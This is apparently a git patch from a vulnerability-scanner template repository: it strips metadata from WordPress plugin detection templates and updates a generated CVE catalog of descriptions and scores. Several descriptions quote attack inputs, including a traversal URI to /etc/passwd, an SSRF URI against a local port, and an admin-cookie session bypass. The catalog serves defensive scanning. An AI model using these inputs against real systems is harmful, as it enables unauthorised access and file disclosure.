max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From c062d0bc76f8b6205720e0160e3ef5bffbb75f69 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 4 Sep 2023 10:17:50 +0000 Subject: [PATCH 0104/1090] Auto Generated cves.json [Mon Sep 4 10:17:50 UTC 2023] :robot: --- cves.json | 78 +++++++++++++++++++++++------------------- cves.json-checksum.txt | 2 +- 2 files changed, 43 insertions(+), 37 deletions(-) diff --git a/cves.json b/cves.json index 30a6e02953..9fb28552ce 100644 --- a/cves.json +++ b/cves.json @@ -499,6 +499,7 @@ {"ID":"CVE-2018-15517","Info":{"Name":"D-Link Central WifiManager - Server-Side Request Forgery","Severity":"high","Description":"D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2018/CVE-2018-15517.yaml"} {"ID":"CVE-2018-15535","Info":{"Name":"Responsive FileManager \u003c9.13.4 - Local File Inclusion","Severity":"high","Description":"Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-15535.yaml"} {"ID":"CVE-2018-15745","Info":{"Name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","Severity":"high","Description":"Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-15745.yaml"} +{"ID":"CVE-2018-15917","Info":{"Name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2018/CVE-2018-15917.yaml"} {"ID":"CVE-2018-15961","Info":{"Name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-15961.yaml"} {"ID":"CVE-2018-16059","Info":{"Name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","Severity":"medium","Description":"WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-16059.yaml"} {"ID":"CVE-2018-16133","Info":{"Name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","Severity":"medium","Description":"Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-16133.yaml"} @@ -517,6 +518,7 @@ {"ID":"CVE-2018-16763","Info":{"Name":"FUEL CMS 1.4.1 - Remote Code Execution","Severity":"critical","Description":"FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-16763.yaml"} {"ID":"CVE-2018-16836","Info":{"Name":"Rubedo CMS \u003c=3.4.0 - Directory Traversal","Severity":"critical","Description":"Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-16836.yaml"} {"ID":"CVE-2018-16979","Info":{"Name":"Monstra CMS 3.0.4 - HTTP Header Injection","Severity":"medium","Description":"Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-16979.yaml"} +{"ID":"CVE-2018-17153","Info":{"Name":"Western Digital MyCloud NAS - Authentication Bypass","Severity":"critical","Description":"It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \\\"cgi_get_ipv6\\\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \\\"flag\\\" with the value \\\"1\\\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17153.yaml"} {"ID":"CVE-2018-17246","Info":{"Name":"Kibana - Local File Inclusion","Severity":"critical","Description":"Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17246.yaml"} {"ID":"CVE-2018-17254","Info":{"Name":"Joomla! JCK Editor SQL Injection","Severity":"critical","Description":"The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-17254.yaml"} {"ID":"CVE-2018-17422","Info":{"Name":"DotCMS \u003c 5.0.2 - Open Redirect","Severity":"medium","Description":"dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-17422.yaml"} @@ -529,7 +531,7 @@ {"ID":"CVE-2018-18775","Info":{"Name":"Microstrategy Web 7 - Cross-Site Scripting","Severity":"medium","Description":"Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-18775.yaml"} {"ID":"CVE-2018-18777","Info":{"Name":"Microstrategy Web 7 - Local File Inclusion","Severity":"medium","Description":"Microstrategy Web 7 is vulnerable to local file inclusion via \"/WebMstr7/servlet/mstrWeb\" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-18777.yaml"} {"ID":"CVE-2018-18778","Info":{"Name":"ACME mini_httpd \u003c1.30 - Local File Inclusion","Severity":"medium","Description":"ACME mini_httpd before 1.30 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18778.yaml"} -{"ID":"CVE-2018-18809","Info":{"Name":"TIBCO JasperReports Library - Directory Traversal","Severity":"critical","Description":"The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-18809.yaml"} +{"ID":"CVE-2018-18809","Info":{"Name":"TIBCO JasperReports Library - Directory Traversal","Severity":"medium","Description":"The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18809.yaml"} {"ID":"CVE-2018-18925","Info":{"Name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","Severity":"critical","Description":"Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a \"..\" session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-18925.yaml"} {"ID":"CVE-2018-19136","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19136.yaml"} {"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19137.yaml"} @@ -554,7 +556,7 @@ {"ID":"CVE-2018-20463","Info":{"Name":"WordPress JSmol2WP \u003c=1.07 - Local File Inclusion","Severity":"high","Description":"WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20463.yaml"} {"ID":"CVE-2018-20470","Info":{"Name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","Severity":"high","Description":"Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20470.yaml"} {"ID":"CVE-2018-20526","Info":{"Name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","Severity":"critical","Description":"Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-20526.yaml"} -{"ID":"CVE-2018-20608","Info":{"Name":"Imcat 4.4 - Phpinfo Configuration","Severity":"high","Description":"Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-20608.yaml"} +{"ID":"CVE-2018-20608","Info":{"Name":"Imcat 4.4 - Phpinfo Configuration","Severity":"high","Description":"Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-20608.yaml"} {"ID":"CVE-2018-20824","Info":{"Name":"Atlassian Jira WallboardServlet \u003c7.13.1 - Cross-Site Scripting","Severity":"medium","Description":"The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-20824.yaml"} {"ID":"CVE-2018-20985","Info":{"Name":"WordPress Payeezy Pay \u003c=2.97 - Local File Inclusion","Severity":"critical","Description":"WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-20985.yaml"} {"ID":"CVE-2018-2392","Info":{"Name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","Severity":"high","Description":"SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-2392.yaml"} @@ -642,13 +644,13 @@ {"ID":"CVE-2019-14470","Info":{"Name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","Severity":"medium","Description":"WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14470.yaml"} {"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c5.0.2 - Local File Inclusion","Severity":"high","Description":"OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-14530.yaml"} {"ID":"CVE-2019-14696","Info":{"Name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","Severity":"medium","Description":"Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14696.yaml"} -{"ID":"CVE-2019-14750","Info":{"Name":"osTicket \u003c 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-14750.yaml"} +{"ID":"CVE-2019-14750","Info":{"Name":"osTicket \u003c 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14750.yaml"} {"ID":"CVE-2019-14789","Info":{"Name":"Custom 404 Pro \u003c 3.2.8 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14789.yaml"} {"ID":"CVE-2019-14974","Info":{"Name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14974.yaml"} {"ID":"CVE-2019-15043","Info":{"Name":"Grafana - Improper Access Control","Severity":"high","Description":"Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of 